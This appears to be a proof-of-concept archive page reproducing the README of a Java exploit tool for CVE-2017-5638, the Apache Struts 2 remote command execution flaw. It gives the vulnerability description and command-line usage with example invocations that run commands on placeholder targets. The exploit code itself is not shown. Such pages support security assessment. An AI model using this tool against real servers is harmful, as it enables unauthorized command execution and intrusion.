Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1310 CNY

100%
Buy Us a Coffee

CVE-2017-5638 PoC — Apache Struts 2 输入验证错误漏洞

Source
https://github.com/m3ssap0/struts2_cve-2017-5638
Associated Vulnerability
Title:Apache Struts 2 输入验证错误漏洞 (CVE-2017-5638)
Description:The Jakarta Multipart parser in Apache Struts 2 2.3.x before 2.3.32 and 2.5.x before 2.5.10.1 has incorrect exception handling and error-message generation during file-upload attempts, which allows remote attackers to execute arbitrary commands via a crafted Content-Type, Content-Disposition, or Content-Length HTTP header, as exploited in the wild in March 2017 with a Content-Type header containing a #cmd= string.
Description
This is a sort of Java porting of the Python exploit at: https://www.exploit-db.com/exploits/41570/.
Readme
# struts2_cve-2017-5638

This is a sort of Java porting of the Python exploit at: [https://www.exploit-db.com/exploits/41570/](https://www.exploit-db.com/exploits/41570/).

This software is written to have no external dependencies.

## DISCLAIMER

**This tool is intended for security engineers and appsec guys for security assessments. Please use this tool responsibly. I do not take responsibility for the way in which any one uses this application. I am NOT responsible for any damages caused or any crimes committed by using this tool.**

## Vulnerability info

* **CVE-ID**: CVE-2017-5638
* **Link**: [https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5638](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5638)
* **Description**: The Jakarta Multipart parser in **Apache Struts 2** 2.3.x before 2.3.32 and 2.5.x before 2.5.10.1 has incorrect exception handling and error-message generation during file-upload attempts, which allows remote attackers to execute arbitrary commands via a crafted *Content-Type*, *Content-Disposition*, or *Content-Length* HTTP header, as exploited in the wild in March 2017 with a *Content-Type* header containing a *#cmd=* string.

## Help

```
Usage:
   java -jar struts2_cve-2017-5638.jar [options]
Description:
   Exploiting Apache Struts2 Remote Code Execution (CVE-2017-5638).
Options:
   -h, --help
      Prints this help and exits.
   -u, --url [target_URL]
      The target URL where the exploit will be performed.
   -cmd, --command [command_to_execute]
      The command that will be executed on the remote machine.
   --cookies [cookies]
      Optional. Cookies passed into the request, i.e. authentication cookies.
   -v, --verbose
      Optional. Increase verbosity.
```

## Examples

```
java -jar struts2_cve-2017-5638.jar --url "https://vuln1.foo.com/asd" --command ipconfig
```

```
java -jar struts2_cve-2017-5638.jar --url "https://vuln2.foo.com/asd" --command ipconfig --cookies "JSESSIONID=qwerty0123456789"
```

```
java -jar struts2_cve-2017-5638.jar --url "https://vuln3.foo.com/asd" --command dir --cookies "JSESSIONID=qwerty0123456789;foo=bar"
```

## Authors

* **Antonio Francesco Sardella** - *Java porting* - [m3ssap0](https://github.com/m3ssap0)

## License

This project is licensed under the MIT License - see the **LICENSE.txt** file for details.


## Acknowledgments

* [Vex Woo](https://www.exploit-db.com/author/?a=8906) for the original Python exploit.
File Snapshot

Log in to view the POC file snapshot cached by Shenlong Bot

Log in to view
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →